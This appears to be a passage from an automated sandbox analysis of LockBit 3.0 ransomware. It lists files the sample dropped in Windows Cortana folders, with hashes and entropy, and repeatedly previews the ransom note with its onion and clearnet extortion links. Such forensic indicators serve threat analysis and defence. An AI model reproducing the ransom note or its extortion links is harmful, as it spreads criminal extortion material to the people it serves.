                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133051594443457600.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):116730
                Entropy (8bit):7.998644913551009
                Encrypted:true
                SSDEEP:3072:AvEdLyI8b0zE8wEEAYgeXjBqyyVGSCNid/uduM3iimK:AvoLyIE8wnAQXjBNSN1uniip
                MD5:3BB477FF669EB2F0AE79E62EF57E1703
                SHA1:DA8A925C28552AECCD0E78BF9D7D5C23F3E99790
                SHA-256:27BA7844993403DE97F66424ABE165722FD46D22A1D61786CA7F573D4B99E7E7
                SHA-512:6C8B814BFBAB2FCCB83461DDD4A2121F03FC973641E48466B0A19A472CF31FD0ACFAB73B2646E879575B1CBA83F18FEB7245677319281A98F21CDEFFA92286E2
                Malicious:true
                Preview:p8.`.y.Rm..a..'...[...=~.....m.&..../.;...Z./.Y....S......S....Dz.c....k.....6.'...i...G..^.jA~. ....m.E.@....q.exX.H....-EH..N.`Sv.<+#...y...\..,./..!.UH]G0...0.@....8..H.En).y("Pn....Y../..5....D.Q..E...^.Dx.....\.L...&.7?N....gB... .......x.......=..#%.~.z......:3..R.\j2X.'..E+.G......9.g..l1[GX...{.)...gC.......X/<..[d.q... (........T...-xD.."..*.-.W.C....e{.f`..%..}-..%..-.(BR.....R..$..g.^L..a`>qj....Do_J.0...&....=.f\D.Q!...!k.........r8q.9.)..8&....P....Us..SH...3.+j?Q.n[..2...W..}u..T.....H..tp=...f.....'.....3...-..G..Wr."........}....b5g..6x..8*=......l..(".. .8Z,A..L..x...a....iZu8,..X....=.c...Z.>>mV..Yb./.=|..t/..&S{.*.;.J"W........1..>..rs......78R..#?.kN.Z....Yx.C....Kx............{ #.....a.;.xz,G/+..ysh.\.tg....Q..H....+...e.).2.p.N.?.<..j...4K_l..~....`i.......[v....Y.%..v.tu.k...BI...C*&x...y.....d]/.Z.?.w5H.|.O.t.$)@..\........o.....Y.!..fe.....OV.\.u.Q.P...H.,<%o4.....Pv..Z8.ta...t....b..T.....M...m.P...Lb.G.....B.<.'

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133114237730981539.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):115250
                Entropy (8bit):7.998567549028605
                Encrypted:true
                SSDEEP:3072:58LLhF57a1JeoVfKGI7EYgmDug18l0CUp/64Lm:54LgJ7IFgCug8EICm
                MD5:A56B1F4CB58768BBDF46A101EF85D2C6
                SHA1:DDA4B5A9E3B2DD3369E4677F524ED013BB0EDD0E
                SHA-256:404A7B1C12FC83ACDE3AC0848CA2E6BAA44B3137A9B2AD458FD81A55CD881277
                SHA-512:1DB678DA7745318FD27DB5596E683D27CA834C3CC26C2C8437A116212EC0BE97E9D1DCD6C5820067EB15ABE37B46D445F79CE8C81747A8F1909C04592B3AEF3F
                Malicious:true
                Preview:Ye......`.j...N....|.....}.@.g@...7.#.p."d.A....Z.V...< a.7.g.....7.Z/..J..%.{e........f.'.......}.d#..R<.:;.dK..ST......]..F..'.L.n...5....W....x...[m.+..h....MdN.JB....:O.Wn?f.%yt\i.>e...#.Wa...C..x.e]...j....$...g^.Z .....Q.Rid...c.0c...[..A...o...S...72yR........%'.7..n...AM........mr...Iu...Z.s!........n._...L.,...}...^H.Q#01.....L...._PR~..:.:...Rh&<l^.....;.:.....+A<m..>..r'.O....oe.....y./I+...=.o).O....?.`...5...`....,.A2.o,........,..F.s...+?>ttX.y..........".....y..Uc:..c....9_v....9.a...:..'!..D4....^1p9.&.b..r....9.I.t...o@8.H`..D.g.Y..L....i..x.e...zI.YO..s.a...M (.@..dz..[B...Uz...\h...C...j:bj.F.[L.%8.]...pH..&C.S..HL...y....0Hc..../..c,..W..v.7......=Qc/..+.E..[.Zm........:jif.t....mm.d:..}....&(....T....h................o.jeW..I..r$"..q...9(......2..S..R.(....nt.I,{.J...........~.Nd...k:a.4.......`e..Qm...b..4...^.a.a.="..W.^..PA.tnp.WQ.HZ."%\.n..^c...o.nf..n..d...6.4...;.......!+>....F...B..d...W+....p..XP

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133114237750867104.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):114297
                Entropy (8bit):7.9982066086071955
                Encrypted:true
                SSDEEP:3072:PXvx5FecZ+YAgP09U+aqVh2Nlc94ePODSw:fvxbl0S+aqVhUlE48On
                MD5:3D60CA6B73D3C1A864F1DDD90DA57DBB
                SHA1:92C5BA0EA88C58D3791C100E06CEEA51DE2BCC71
                SHA-256:4F3472C17F27FDD7696AD817AA0137E0D39A0AB4D5E6D99E13AA044843CC85B8
                SHA-512:0761D2768F7EFF77E031D0F5A5E9941246A11B3AB4BED74A87296FC609995B1CD76EA9E44B13D3C25377637F10E48BE27AD0C2454B25E4752D0D0B195CD163FB
                Malicious:true
                Preview:t.x...%.7)8.........Q.R...."*...o......L.8.-..aD^..N.h..ox.v.r....Kvc..~\..vW....V.|..0..........-..O..\..NW.W.....FQ..\....0.......U\..m..8.A5Z1......y......q...P..4h.[s.V..1........1. F....H.5..J\..@.../....G.i`.GId.:...8.......;...@l...a...~J..M.[......r ....2..o.uk..n...b..W......F..!..8j.].|....M.O.*.._......~.....~.....m... .......z(....?..a.......Y.g....W.o4+{Z.7..........M.J.Xa...ca,.4D..ar>..6.~0...&E.,.UC;Wb|..F%ORcu.$..D.x....u.T.(...F....G.=.O.....(.....T......kg.4..Z.j....&r...=..=.......a....\.JmbOqh.a...x?...',.../:.C.".s.Q..a.f..h.KZ.i....D?p...}uy,_m...h.....'.<.J.....k.U.<...o M.\t>#.c.-g..a^.......X..B~?e......@t.&.L. .5.+.K..G..QQ.......e.6q#..`.8o...Y.'z37......s..f.5.C........d..D.Ej..n........Z..49ys$.NvG.(m...O.r..V.`..Yi..N...$.dC...^!.yA1..*a.G2s.<....p{..ce...em...^.K?.....z.J.o5H...W.5.t=..Ap.@<.uF.K...y.....!w.-..rG..$5.b..l..[....Z.`.(..H..)@..of...!...E...q..lwb.n02..gFLKX-....x..3...]i..y

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133114238038131791.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):114295
                Entropy (8bit):7.9982767079057115
                Encrypted:true
                SSDEEP:3072:k6wzhKUwV8bvfpkEqNd3rVAMcUiuUpklW8T/Zi:k6wVKVpTv7X8npWW8Zi
                MD5:A34EB9B1E6EB872E54ECF2979940112C
                SHA1:23C0353809D9DE142A44DBD6A3A89C10DEC640E0
                SHA-256:7C18B5AA1541FF22F31E79238F4BF14367995DA814E8297AA27677A8E36FAD21
                SHA-512:629F12C4E936151B7C46B2E080B08424CAA1DB5B4E36A9D14FFE9B62FA891EA00E7FD224523F7C3FD9D7CBDC9FAE25EC5E6A139F0C8979B20CCD7CFE134F7896
                Malicious:true
                Preview:.!.^........?..K.8..{.V....Gf..p.^!..tme.......V..6.=.-Z...LH..`...Y......D.../..U...E.,...........RX.bTI....I=.....EOf...|...p|.@l...)..idX5..(u.Bx"...[6.im.#..K6Cq....~..u..0.....,M*.>Z..$.....`9.G..}......`..=.$..L....}..i."..AB.$..s2c.......KSZ.S...x:..w...'.J+.....A.S.....(/......:G....%5...(t.4<....wd..&Fe`...*.T.F....,v.].{.B.mw..G....e.88FF........H.bg.......t..G.S.t../:..G....@.....K*=..S+.o~....2#.&`..._..#.`:..."o..ru-s.'&a......2...E.U;y.t.s...vb].iL..U....;.b.|../. #.....zI.........nr. &~.BA..q5F......t.....q..D..c......W..6N...?...^...^.I...1.Z*..?|......t....oD..|R....a.g.....?[q:..kP0....;....3...l...[U>.....q...'.i.....1@.FP~E..+......[A..z=<.S..D8...<...a{.1......B...CC...X{].!....{...R.._...._w|.....)..kD.5....F............h.nK.....9...$...S......u...N..<+{.........\}.s.PBwuh....l/.<.......e8Y]s.........Z.*xq.mi........i.f.a..g3m..l..Sd.i3.......GE..Y.`b.T.x.[...G..|.*...6:.*.|...%..|;.@..=....U'K...AaD..Xq.E"]x

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):413304
                Entropy (8bit):7.999587374230007
                Encrypted:true
                SSDEEP:6144:EcfOGvx+E2OTJJvvoVKX5iIeCRsNeC0xAxNkSSML5PunnJ1YOBwcCiI3a++:EcfOGpHjvgMI9Nkx0kSSIWJSTcWN+
                MD5:0ABA2A7702AFF9ABBCB1068EC53E7122
                SHA1:45E89ED641B81409715B487565353FFA451D3632
                SHA-256:42813FBAF2A2E01ACC5FFC8C5837FEA053CFF35F886C9B67A0EBE27CA12D1396
                SHA-512:48CD209C11E1FAF572DD6FA9168DB228B0DFD10DA10EB1FCD3E52CD8233C7991AF5FBDDCFAA8EFDCD5F134D0109BC7C0B345FDF28BE3E02887BB880A262DE66C
                Malicious:true
                Preview:.'g..+.j.uU/..>V..$...c...5Yj..k}..N......0..0.....b..sj.pC.j..L*/.X..15w.0<(..}sEP..W.V.)...5....;.........|.....)....":........(.^.......,.sg..5...p.#.U.Y.D.P.....t.......r.....:.....a3..pG.K!.G/.."...%.).....L....p.XA......r( .R}(.v.r.O.u.Mt.Y .y.....I.....k..k.z4`.:.7l.y..J.CvR.@..v..daF.7&9..c.M.Q..Y...%m.}...6...Urt...9V..W+M.i.(a...[...<I...E....K.;.eG..*;N...b...q.."$....|.k.....3..t..yF.d]X}.......g..L.F.Oc2.....#..O..U.`.......?..Y@.)....,.J.X.;p.....]e.GC._....t.2M.#.X-5.L._#..7E(.N.....g.;..p...P2M....`O.B.f......?w...d.d.$..,i.G.A..:>G..>Ra"\. ...Xzp.j.&.T.{..Jl....M3i.t..S....{y....3...j...M(..b..,?50?...2.a....<.28;..1..r,..~>....,...-...&7.w..m....g_..P<.W........[....m......E....%..m\.CD.E^M..D4.Y...._...e(...{.....(...c.e7d83t..$@Pw.N..1..Y.+....(.Se....qwN.._GDH&.z2..<v.....>...z.p.%..h...(..u...o..4=5W...^....U.`.FE.w...B.....d...P...?.J(.V.Q.?M.D..........7..).3....#..*..Nw.....2.G..;.:........E..@......P..d.8g....xMy

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\Flighting\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):68304
                Entropy (8bit):7.996888580779294
                Encrypted:true
                SSDEEP:1536:8GwnqzI3sh4PblrbuMnNTrUjdiR3kr6Kryxilb3s:VD9h4PbFbzJqi2rtmxilb3s
                MD5:353A71F3DE21B53F9D4C1FB22B12FCF0
                SHA1:882A261373897AC39F4E59CC1298E51A485F54A8
                SHA-256:32BDD259EE80232762D5884B13DE91A0DF510B2F6E6948F1C72961D570FE426D
                SHA-512:3EC3A6B16A26CAA0AA443E98F928EE65F36ADD4F5EAC9ADFA225A1A96587C7D24C53782D0EAAD03FAD492EC2C1ECA350BE46A8E475401FD05692E74138FB0F70
                Malicious:true
                Preview:....~Y..+Yf1.?:6.C..c.F&..}.@.I. .t.hN..!.g+{C.)..S.r..jHQQ.h.%th...<..m.g.,'...E..F..'9.Cxhf...1X..I^......>...K.!.|...s..y..X....^8....Z'.R....x^.<./.W.. `....K.%..2.r..&.v...v.#......+..%.......z@.4...~...Y.r...B.M.].c.WZ..q...]Pb.....Z....F..G&...M2...yyS>.z...8..X$.d..OB.%...}P.(...../|....+ .!f/..Xp..V.H.K.JD4nC.L..J.1.y[.a.*w....-}...i.R...Z,k>/.]...t].UU...bK...Y..S&M.DB..*|s..l..'..%....$...Z..+.4.....n}C.H-n..............Q6.............r.}I......"=n.pXW....Vu.l...q....>..!...4nB...Gb..=".C[-N.............a.....v-9.+.S.|pn#7....G......O./....h..'.[.G3{b...1!.At%2.Da.H...M.z.=......K.e.....C7..MN/......&..vg...%x..P.\L^..o[.Z~...t...x..nC......%m.(g.Uc.=.o...X..'....p..M....ps.q..~WsG.9...{.l......d..X..0Qe..A..CN.#......;.r.DJ..9.S.......Lh.3.H.V...D.g......"..p...../.B.3....{.#..c~.>(.16.o..."...v...'..L...q0s/..Tf2a.W...Y....2.......u.:........t.@G5.Ga.SH..7.../...Q...R..B.smB.by.9..{...2.!...O.....o.S....._)6U.%...Q.I

